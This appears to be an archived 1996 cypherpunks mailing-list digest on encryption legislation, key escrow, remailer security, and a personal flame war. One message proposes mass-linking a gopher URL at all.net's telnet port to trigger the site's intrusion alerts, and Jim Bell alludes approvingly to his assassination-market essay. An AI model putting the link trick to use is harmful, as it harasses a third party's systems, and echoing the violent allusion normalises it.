>> > could be making is that it will be interpreted INTELLIGENTLY by courts.
>
>> Wrong.  The assumption is that the rules of statuatory construction and a
>> long history of weighing legislative history will be used in intrepreting
>> the statute.
>
>Surely one of the basic assumptions of the supporter of any bill is that it
>_will_ be interpreted intelligently?  [Note - Jim is not saying this is the
>_only_ assumption].

Exactly!

>It's hard to make bills foolproof, since fools are so ingenious ...

And hard-working, too!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Mar 1996 04:04:55 +0800
To: Gary Howland <gary@kampai.euronet.nl>
Subject: Re: FCC & Internet phones
In-Reply-To: <199603121049.FAA20806@bb.hks.net>
Message-ID: <199603121658.LAA01954@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Gary Howland writes:
> Adam Shostack wrote:
> > 
> >         Are you willing to play Mallet?  Drop IP packets, and look for
> > duplicates.  Those are TCP.  (IPSEC might handle this, but I bet there
> > will be broken implementations that save time by resending.)

Since the TCP and IP layers are not the same, this won't happen. The
retransmit occurs at the TCP layer and the IP layer will re-encrypt
with a new initialization vector.

> Are you saying UDP protocols don't retransmit un-acked packets?
> If not, then you can't be sure the duplicates are TCP.

Also true. Plus there are IPSEC transforms being talked about that
will put in replay elimination, so I doubt this is going to be a
problem.

On the other hand, you can detect TCP packets pretty easily by timing
them. They will usually follow a nice Van J. algorithm profile.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 20:09:29 +0800
To: "David K. Merriman" <cypherpunks@toad.com
Subject: How's that again?
Message-ID: <m0twag5-0008xXC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 AM 3/12/96 +0600, David K. Merriman wrote:

>I've *finally* had a chance to try and catch up on my CyP (vice CoP) reading, 
including the running tit-for-tat between Jim Bell and (most of) the rest of 
the list.

I think this is an exaggeration...  I"ve been told that this list goes to 
over a thousand addresses.  Weighted only among those who choose to post (a 
self-selected group, obviously), I do raise some heat, but it isn't clear 
that "most" or even a large minority of the list disagree with my 
conclusions.  I'm not assuming they agree, but you seem to be assuming they 
disagree.

>While Mr. Bell's Assassination Politics idea has a lot of interesting 
ramifications, I've found that his >apparent 
in-your-face-and-wha'cha-gonna-do-about-it-PUNK attitude makes reading his 
postings very tedious.

In the last few days, I'm basically ignoring AP, and am fighting a fire that 
some people around here think is just fine.  You might note that the same 
people who have been most critical of my stance on the Leahy bill are the 
same ones who vigorously opposed AP, suggesting that their motives are  
questionable and certainly a bit "predictable."  As I've mentioned before, 
and as a contrary example, I've seen (on other lists/echoes) at least two 
separate instances where people who (proudly?) claim they "always" oppose 
everything I say, say that my stance on the Leahy bill is quite accurate. 
_THOSE_ people are at least honest enough to not (always) oppose a position 
simply because "Jim Bell" supports it, or vice versa.


>Perhaps if 'we' were to simply read his postings, and respond *only* to 
those that maintain a civil tone, it would finally sink in with him that his 
Terrible Two's antics aren't appreciated.

There's is a better tactic you could take.  If somebody says something to 
me, or for that matter to the entire list, that you consider foolish and 
unsupported or elitist or  just plain wrong, rather than expect _me_ to wipe 
the floor with him, _you_ criticize in a far more tactful manner.  Frankly, 
I get tired of doing the heavy lifting for all the slackers out there who 
are seemingly content to just sit back and watch the fray.  Normally, 
there's nothing wrong with just READING, per se, but when people like you 
make statements like:

>I've *finally* had a chance to try and catch up on my CyP (vice CoP) reading, 
including the running tit-for-tat between Jim Bell and (most of) the rest of 
the list.

...there is at least the (false) implication that the dispute is between me 
and "the silent majority", a term pioneered by Richard Nixon, in case you 
either don't recall or weren't around when it happened.  You (and he) were 
falsely suggesting that anybody out there who doesn't say a thing MUST be on 
your side.

>The only other options I see are:
>        Someone gets his snailmail address and sends him a Dale Carnegie 
book, or
>        there's a mass kill-filing, with him as the guest of (dis)honor.
>
>As noted, his AP idea seems worth discussing, I'd be reluctant to lose it. 
I'd hate to see him turned into LD-2 (Son of LD? :-) because he doesn't seem 
to have learned Tact and Manners yet.

You will notice, I assume, that I have been and can be tactful to most 
people; where exceptions exist, they are typically among anonymous posters 
(such as this "Black Unicorn") who has now admitted he's an elitist legal 
snob and doesn't want anybody who hasn't spent a few years in law ("mental 
reform") school to pass judgment on the judges, no matter how outrageous 
their actions become.

Oh, yes, and I can't forget Padgett Peterson, who has raised spinelessness 
to a new art form.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 13 Mar 1996 09:56:42 +0800
To: perry@piermont.com
Subject: Re: Remailer passphrases
Message-ID: <199603122027.MAA10600@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:51 PM 3/12/96 -0500, Perry E. Metzger wrote:
>Bill Frantz writes:
>> One of the reasons classical (government) crypto users change keys
>> frequently is to minimize the amount of data compromised by a broken key. 
>> We keep hearing about NSA decrypting 20 year old cyphertext and showing
>> more of the workings of the atomic spy rings operating in the 40s and 50s. 
>> If an opponent can rubber hose the key, her job is easy.  If she has to
>> perform cryptoanalysis, it is much harder.  Remailers should regularly
>> change their keys to avoid compromising previously recorded traffic.  (They
>> can have a long lived key for signing their traffic keys.)
>
>Signed Diffie-Hellman key exchanges have the property known as
>"Perfect Forward Secrecy". Even if the opponent gets your public keys
>it still will not decrypt any traffic for him at all -- it just lets
>him pretend to be you. Thats one reason why protocols like Photuris
>and Oakley use the technique.

Unless I am badly mistaken, these exchanges need interaction, which makes
them unsuitable for simple remailers.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 13 Mar 1996 12:21:50 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: How's that again?
In-Reply-To: <m0twag5-0008xXC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960312143109.13566C-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 12 Mar 1996, jim bell wrote:

> You will notice, I assume, that I have been and can be tactful to most 
> people; where exceptions exist, they are typically among anonymous posters 
> (such as this "Black Unicorn") ...
> Oh, yes, and I can't forget Padgett Peterson, who has raised spinelessness 
> to a new art form.

Hey, Jim, don't forget me.  You are the only person I have ever
specifically UNinvited to one of my parties in over a decade of
hosting same.  I guess that makes you special.


 S a n d y  (just another statist apologist)  S a n d f o r t

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 10:13:36 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: How would Leahy bill affect crypto over HAM radio?
Message-ID: <m0twclj-00090RC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:21 PM 3/12/96 +0000, Deranged Mutant wrote:
>Jim Bell wrote:

>But it's more than breaking an agreement. If you voluntarily escrow 
>your key (as with a corporation) and the holder is bribed to give it 
>to a competitor, it may be more worth the holder's while to break a 
>contract for the dollars the competitor may bribe him with.  It makes 
>sense to have some criminal punishments for that.

Well, okay, but we've really got to define whose key is being escrowed, 
anyway.  Most corporations will probably handle it themselves, OR they will 
only give an ENCRYPTED escrowed key to the escrow agent.  This would prevent 
the escrow agent from disclosing the key without authorization.  Naturally, 
this raises the question, "who will escrow the key to the escrow," but then 
again, I think most individual citizens wouldn't trust anyone else with 
their key anyway.  

I think that where it is unnecessary to keep a key, such as a 
crypto telephone, no such key should be kept, certainly not "permanently."  
A crypto phone could simply generate a new public key for each phone call, 
verified with a permanent key to foil MITM attacks (but the permanent key 
won't be used to transmit actual voice data) and the temporary public key 
erased and replaced after the call ends.  Siezing the telephone would be 
useless because it would contain no information that would help resurrect 
the phone call data.

>Yes. In all areas of gov't. I'm all for the death penalty for 
>prosecutors who push for the d.p. on people they know are innocent, 
>for instance.  It'll never happen (at least not in our lifetimes), 
>but it makes plenty of sense to me.

Hey, I'm working on it!  I assume you've read my essay...


>> 2.  Hams drive technology (although admittedly that it's really so true 
>> anymore, either.)
>
>Internet to Ham links, though?  There's some technical drive there. 
>It's just plateaued.

I look with a little disappointement on packet radio.  I tried it once, but at 1200 
bps (simplex, and the "real" data transfer rate is far lower than even this 
number would imply) it simply isn't a practical method of transmitting large 
quantities of data.  Even the more modern 9600 bps packet modems are 
probably not a lot better.  Microwave links can handle far more, but few 
people are in the right spot for such a link.  The main hope, I think, is 
satellite-based Internet service, perhaps included in something like that 
DSS service.  It could easily handle far more than the current volume for 
USENET, for example.  That's not ham-level territory, however.  Few hams do 
microwave, even fewer do anything other than straight FM or AM.  The only 
microwave thing I've done is build a homebrew 36 GHz Gunn oscillator module, 
which raises a few eyebrows even among seasoned microwave hams, because not 
only isn't 36 GHz a ham band (It's Ka band radar, the kind they use for 
photo radar) few microwave hams dare go above K band (24.125 Ghz) and most stay at 
X-band.  (10-10.5 GHz).


>> But what law giveth, law can also taketh away.  A few years ago, a 2-MHz 
>> portion of the 220-225 MHz ham ban (220-222 MHz) was taken away and given to 
>> UPS, yes, UNITED PARCEL SERVICE.  Ostensibly, the reason was that hams 
>> weren't using it adequately, a claim which might or might not have been true.
>
>Who did UPS donate campaign funds to?

I wish I knew!  "Fortunately" (though some hams would disagree) the FCC 
implemented a Morse-code-less license a few years back, which I hope will 
bring much larger numbers of hams into the hobby, and I think already has 
had a serious effect. (I became a ham in 1986, more than a decade after I 
had all the electronics skills to pass the "technical" section, delayed simply 
because I didn't appreciate being forced to use an archaic method to 
transmit data.  I finally developed enough ham friends that I felt a bit 
left out, so I spent a couple of weeks learning Morse.  I never use it.)

This should have substantially increased the number of hams and their 
political clout, which should keep the current spectrum allocations secure 
for a while.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Mar 1996 07:14:50 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Remailer passphrases
In-Reply-To: <199603121853.KAA28808@netcom8.netcom.com>
Message-ID: <199603121951.OAA02237@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> One of the reasons classical (government) crypto users change keys
> frequently is to minimize the amount of data compromised by a broken key. 
> We keep hearing about NSA decrypting 20 year old cyphertext and showing
> more of the workings of the atomic spy rings operating in the 40s and 50s. 
> If an opponent can rubber hose the key, her job is easy.  If she has to
> perform cryptoanalysis, it is much harder.  Remailers should regularly
> change their keys to avoid compromising previously recorded traffic.  (They
> can have a long lived key for signing their traffic keys.)

Signed Diffie-Hellman key exchanges have the property known as
"Perfect Forward Secrecy". Even if the opponent gets your public keys
it still will not decrypt any traffic for him at all -- it just lets
him pretend to be you. Thats one reason why protocols like Photuris
and Oakley use the technique.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Mar 1996 09:05:27 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Remailer passphrases
In-Reply-To: <199603122027.MAA10600@netcom8.netcom.com>
Message-ID: <199603122030.PAA05252@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> >Signed Diffie-Hellman key exchanges have the property known as
> >"Perfect Forward Secrecy". Even if the opponent gets your public keys
> >it still will not decrypt any traffic for him at all -- it just lets
> >him pretend to be you. Thats one reason why protocols like Photuris
> >and Oakley use the technique.
> 
> Unless I am badly mistaken, these exchanges need interaction, which makes
> them unsuitable for simple remailers.

Well, actually, you can play similar tricks with El Gamal...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Mar 1996 10:09:08 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Key Escrow: Scholarly Treatment
Message-ID: <Pine.SUN.3.91.960312155525.261A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Interested cypherpunks might want to have a look at:

"A puzzle even the codebreakers have trouble solving: A clash of 
interests over the electronic encryption standard," in the most recent 
issue of Law and Policy in International Business, The International Law 
Journal of Georgetown University Law Center.

Mr. Sean M. Flynn does a fairly good job of outlining the policy issues,
even if perhaps he managed to go a bit light on the NSA and miss some of his
history re: the marketing of broken systems to the private sector and
third world nations, and the mistrust the NSA seems to have earned as a 
result.  I was also disturbed to see him fall into the government's 
"voluntary standard" trap but still, it's really nice to see a legal note 
with cites like:

See e.g., Bruce Schneider, Applied Cryptography (1994)
John Perry Barlow
National Security Agency, Recruiting Brochure
Unclassified Summary: Involvement of the NSA in the Development of [DES]
Marc Rotenberg
Whitfield Diffie
Jim Bidzos
mech@eff.org (I kid you not)
Wired
and
A personal interview with D. Denning

Worth the read, nice bit of research, if lacking in the "spirit" of things.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Wed, 13 Mar 1996 00:46:28 +0800
To: cypherpunks@toad.com
Subject: Re: FCC & Internet phones
Message-ID: <199603121510.QAA14739@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> Gary Howland wrote:
> | Are you saying UDP protocols don't retransmit un-acked packets?
                   ^^^^^^^^^^^^^
> | If not, then you can't be sure the duplicates are TCP.
> 
> Err, yes.  Thats the point of UDP; its unreliable and has no
> acknowweldgement.

Sorry, I meant protocols using UDP, not UDP itself.

Gary




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 13 Mar 1996 10:23:10 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: How would Leahy bill affect crypto over HAM radio?
Message-ID: <199603122128.QAA19067@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell wrote:
[..]
> I think it's going to take a LOT of pestering.  I didn't see a single 
> concern of Mr. Junger that sounded inappropriate, and there are a lot of 
> protections that could be added to this bill if people like him had the 
> opportunity.  A substantial load of stuff needs to be REMOVED, as well!  All 
> that key-escrow crap, at least with regard to the escrow holder.  If key 
> escrow is VOLUNTARY, then the key user and key holder can come to whatever 
> VOLUNTARY agreement they'd care to.  The only "key escrow" material that 

But it's more than breaking an agreement. If you voluntarily escrow 
your key (as with a corporation) and the holder is bribed to give it 
to a competitor, it may be more worth the holder's while to break a 
contract for the dollars the competitor may bribe him with.  It makes 
sense to have some criminal punishments for that.

> needs to be put into law are unavoidable criminal penalties for GOVERNMENT 
> AGENTS who induce people to violate their contracted obligations, and 
> requirements that any key-user be informed immediately if his key escrow 
> agent is approached on any matter related to his escrow agreement, 
> especially if this approach is done by a government agent.

Yes. In all areas of gov't. I'm all for the death penalty for 
prosecutors who push for the d.p. on people they know are innocent, 
for instance.  It'll never happen (at least not in our lifetimes), 
but it makes plenty of sense to me.

[..]
> Hams have been allocated a lot of (now!) very valuable spectrum space.  The 
> orginal arguments for that were probably:
[..]
> 2.  Hams drive technology (although admittedly that it's really so true 
> anymore, either.)

Internet to Ham links, though?  There's some technical drive there. 
It's just plateaued.

> 3.  Hams provide valuable community services, for example in case of 
> emergencies.  (still true)
> 
> But what law giveth, law can also taketh away.  A few years ago, a 2-MHz 
> portion of the 220-225 MHz ham ban (220-222 MHz) was taken away and given to 
> UPS, yes, UNITED PARCEL SERVICE.  Ostensibly, the reason was that hams 
> weren't using it adequately, a claim which might or might not have been true.

Who did UPS donate campaign funds to?

> Hams "police" themselves and their spectrum space fairly well, because abuse 
> (or merely lack of use!) may lead to the loss of the space.

An interesting internet analogy can be drawn here...

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 12:20:16 +0800
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: How's that again?
Message-ID: <m0tweHS-0008zIC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:38 PM 3/12/96 -0800, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>On Tue, 12 Mar 1996, jim bell wrote:
>
>> You will notice, I assume, that I have been and can be tactful to most 
>> people; where exceptions exist, they are typically among anonymous posters 
>> (such as this "Black Unicorn") ...
>> Oh, yes, and I can't forget Padgett Peterson, who has raised spinelessness 
>> to a new art form.
>
>Hey, Jim, don't forget me.  You are the only person I have ever
>specifically UNinvited to one of my parties in over a decade of
>hosting same.  I guess that makes you special.
>
>
> S a n d y  (just another statist apologist)  S a n d f o r t

You're confused.  You're describe YOUR reaction to ME, not MY reaction to 
YOU.  And I am unaware of being invited to a "party," and now that I've 
discovered what a sleazy person Alan Olsen and his merry band are, it is 
really doubtful that I would have enjoyed what was advertised as a 
cypherpunks meeting, but which you now claim was a "party."  Your level of 
"honesty" is showing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@extropia.wimsey.com
Date: Wed, 13 Mar 1996 16:14:19 +0800
To: cypherpunks@toad.com
Subject: all.net
Message-ID: <199603122155.QAA04971@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone else received one of these?

> From: root@all.net (root)
> 
> A user at your site has just attempted to telnet into our site without
> proper authorization.  We consider this inappropriate behavior and would
> like an explanation of this action as soon as possible.
> 
> This message is generated automatically at the time of the attempted
> entry and is sent to our administrators and the postmaster at the
> machine making the attempt.  We have included any information provided
> by your ident daemon (if in use) on the subject line of this message.
> We also do a reverse finger for future reference.
> 
> Fred Cohen - fc@all.net - tel:US+216-686-0090






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Mar 1996 22:08:01 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: How's that again?
In-Reply-To: <m0twag5-0008xXC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960312173544.788D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Mar 1996, jim bell wrote:

> some people around here think is just fine.  You might note that the same 
> people who have been most critical of my stance on the Leahy bill are the 
> same ones who vigorously opposed AP, suggesting that their motives are  
> questionable and certainly a bit "predictable."

Or that your tone and method of delivery combined with your knowledge of 
the subject matter at hand is consistantly lacking.

> You will notice, I assume, that I have been and can be tactful to most 
> people; where exceptions exist, they are typically among anonymous posters 
> (such as this "Black Unicorn") who has now admitted he's an elitist legal 
> snob and doesn't want anybody who hasn't spent a few years in law ("mental 
> reform") school to pass judgment on the judges, no matter how outrageous 
> their actions become.

I believe my concern was with your review of legislation and the impact 
of cases without any legal background.

Revise your statement to:

"doesn't want anyone who hasn't spent a few years in law school to pass 
judgement on pending legislation and the effect of supreme court decision 
thereon..."

and you'd be right on the money.

And I confirm again that I'm an elitist legal snob.  At least I know what 
I'm talking about.

> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Wed, 13 Mar 1996 16:19:40 +0800
To: cypherpunks@toad.com
Subject: Re: AMEX and Netscape
Message-ID: <v02140b00ad6bbbab23b5@[199.1.11.229]>
MIME-Version: 1.0
Content-Type: text/plain


>American Express Platinum card holders might want to look at the bottom
>of their statement:
>
>CARD USE ON THE INTERNET -- Cardmembers should only conduct transactions
>
>(Any Gold or Green card holders have the same notice?)

Green - yes.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Wed, 13 Mar 1996 17:35:04 +0800
To: cypherpunks@toad.com
Subject: Beat Remote Monitor Snooping?
Message-ID: <960312193120_444876976@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I know that monitors emit RF signals that can be detected and decoded for a
considerable distance.  I have a question about this.  Obviously, the
difference between black and white (white text on black background, or vice
versa) would be the most detectable, because the difference in signal levels
would be the greatest.  Would it be possible to reduce or prevent this kind
of snooping by using color schemes that all use the same signal levels?  For
example, the color purple uses the red and blue color guns, and yellow uses
the red and green color guns.  Would purple text on a yellow background be
able to be read by a remote snooper?  If not, then perhaps these color
schemes could be used to echo pass phrases--assuming the user isn't worried
about someone looking over their shoulder.  Any comments?

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 13 Mar 1996 14:48:31 +0800
To: You All <cypherpunks@toad.com>
Subject: Re: all.net
Message-ID: <199603130343.TAA27040@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 PM 3/12/96 -0500, anonymous@extropia.wimsey.com wrote:
>Has anyone else received one of these?
>
>> From: root@all.net (root)
>> 
>> A user at your site has just attempted to telnet into our site without
>> proper authorization.  We consider this inappropriate behavior and would
>> like an explanation of this action as soon as possible.
>> This message is generated automatically at the time of the attempted
>> entry and is sent to our administrators and the postmaster at the
>> machine making the attempt.  We have included any information provided
>> by your ident daemon (if in use) on the subject line of this message.
>> We also do a reverse finger for future reference.
>> 
>> Fred Cohen - fc@all.net - tel:US+216-686-0090

How annoying that all is. I wonder what they all do there. "All sorts of
things," I guess. Wouldn't it be interesting if we ALL linked to...

 gopher://all.net:23/0howdy

-rich

All Things, Inc. (ALL2-DOM)
   PO Box 1480
   Hudson, OH 44236

   Domain Name: ALL.NET

   Administrative Contact:
      Cohen, Fred  (FC34)  fc@ALL.NET
      (216) 686-0090
   Technical Contact, Zone Contact:
      Network Information and Support Center  (PSI-NISC)  hostinfo@psi.com
      (518) 283-8860

   Record last updated on 31-Jan-95.
   Record created on 31-Oct-94.

   Domain servers in listed order:

   NS.PSI.NET                   192.33.4.10
   NS2.PSI.NET                  38.8.50.2





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Wed, 13 Mar 1996 12:05:49 +0800
To: cypherpunks@toad.com
Subject: Second mini-AIR report on PGP-Y
Message-ID: <Pine.SCO.3.91.960312194444.13406A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain



The following appeared in the latest issue of The mini-Annals of 
Improbable Research ("mini-AIR"), Issue Number 1996-03,
March, 1996, ISSN 1076-500X (a superb sceince journal that comes with
my highest recommendation, BTW):

-----------------------------------------------------------
1996-03-05	PGP-Y Ill Advised

Reader Andrew Rock has been investigating our foolproof data 
security protocol, PGP-Y (Pretty Good Parasychology). He intuited 
this missive to us:

"You were ill-advised to release the details of your PGP-Y -- 
"Pretty Good Parapsychology" protocol on an international mailing 
list such as mini_AIR. US law prohibits the export of such highly 
secure transmission technology, defining it as munitions. Your 
proposal must await government-approved key espcrow [sic] systems 
rumoured to be under consideration by the NSA. The approved 
systems will prohibit the possession or transmission of ideas 
beyond the imagination of government officers. Please do not 
carelessly put the publication of AIR at risk while I have nearly 
two years left on my subscription."

Investigator Trevor Green and a large team at the University of 
Saskatchewan have also been laboring in the field. Green reports:

"After an initial trial period of PGP-Y within our department, we 
have had some disappointing initial results. While the 
transmission rate is nothing short of paraphenomenal, the security 
mechanism is, alas, not wholly foolproof -- everything worked 
fine, until my friend Steve started imagining that he was 
intercepting the telepathically-transmitted data. We are sure that 
this technical loophole may be overcome but wish to alert your 
paranormal engineers to the oversight. Meanwhile, I am pleased to 
report that the credit-card fraud charges against Steve will be 
settled out of court."

-------------------------------------------------------------------------       
|      Liberty is truly dead              |Mark Aldrich                 |
|    when the slaves are willing          |GRCI INFOSEC Engineering     |
|     to forge their own chains.          |maldrich@grci.com            |
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Mar 1996 16:01:56 +0800
To: cypherpunks@toad.com
Subject: Re: frequency of remailer use? (fwd)
Message-ID: <199603130447.UAA07724@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Multi-hop messages are probably more important than cover traffic.
If the average message does two hops, then dive your estimates by two, etc.
In a real privacy environment, almost nobody would send serious messages
by just one remailer hop.  On the other hand, for posting minor spam
and non-professionally-secure messages to mailing lists, one hop will do.

A first step at estimating this would be to check the fraction of mail
addresses to known remailers (since most remailers are more likely to
track destinations than sources.)  Most of pamphlet's bouncemail is
from other remailers, but that seems to be more of a configuration issue,
or people sending test mail to mixmasters or something.

>One could make some attempt to account for all known cover traffic. Given a
>known average quantity of cover traffic, the rest is either real or
>independent cover.
>> > I would be very grateful for pointers to data concerning the number of
>> > messages that pass through remailers.  (Not anon.penet.fi -- real
>> > remailers.) I am currently in a conversation with a journalist who should
>> > know better, but claims that secure anonymous remailers are never used by
>> > anyone -- just a curiosity.
>>Good question.  How do we determine this without ourselves being able
>>to distinguish between cover traffic and "real" traffic?
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 13 Mar 1996 16:07:11 +0800
To: cypherpunks@toad.com
Subject: Re: How's that again?
In-Reply-To: <m0tweHS-0008zIC@pacifier.com>
Message-ID: <XTJPkD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> At 02:38 PM 3/12/96 -0800, Sandy Sandfort wrote:
> >Hey, Jim, don't forget me.  You are the only person I have ever
> >specifically UNinvited to one of my parties in over a decade of
> >hosting same.  I guess that makes you special.
>
> You're confused.  You're describe YOUR reaction to ME, not MY reaction to
> YOU.  And I am unaware of being invited to a "party," and now that I've
> discovered what a sleazy person Alan Olsen and his merry band are, it is
> really doubtful that I would have enjoyed what was advertised as a
> cypherpunks meeting, but which you now claim was a "party."  Your level of
> "honesty" is showing.

"Cypherpunk" is not a trademarked name. I've seen people say on this list
(paraphrased) "I'm a cypherpunk, and I oppose unrestricted free speech
because we must silence {homophobes}child pornographers|terrorists}" or
"I'm hosting a cypherpunks meeting and X will not be permitted to come
because I don't like his political views". I like reading this list, but
if these views are compatible with being a cypherpunk, then I'm not one.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 Mar 1996 08:43:38 +0800
To: cypherpunks@toad.com
Subject: Re: Bell, Detweiler, Ravings, and Whatnot
Message-ID: <199603122041.VAA21453@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes in answer to jim bell -

|Screaming insults at people, resorting to ad hominem attacks on their
|personality (such as Jim did with Padgett Peterson), ranting about how
|people are fools and worse, and generally foaming at the mouth...these are
|behaviors which cause people to be dismissed as jerks, paranoids, and
|killfile occuppants.

|I have nothing against you, Jim Bell, but you are coming across as a loon,
|as someone who clearly needs some kind of anti-psychotic medication.
This is not supposed to be an insult??

|You rant, you quote excessively, you dissect short comments with 
|pages-long diatribes
Says the one complaining of jim making ad hominem attacks.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 Mar 1996 12:26:14 +0800
To: cypherpunks@toad.com
Subject: Re: ADL_mil (militias and the USAF)
Message-ID: <199603122050.VAA21740@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



<html><title>ADL Report</title><body>
"The Anti-Defamation League has committed defamation. There is no other conclusion to be reached after reading its new report, The Religious Right: The Assault on Tolerance and Pluralism in America. It is sad that an organization with a proud history of fairness should have descended to this kind of character assassination and name calling."
<p><dd>- Columnist Mona Charen <i>(1)</i>
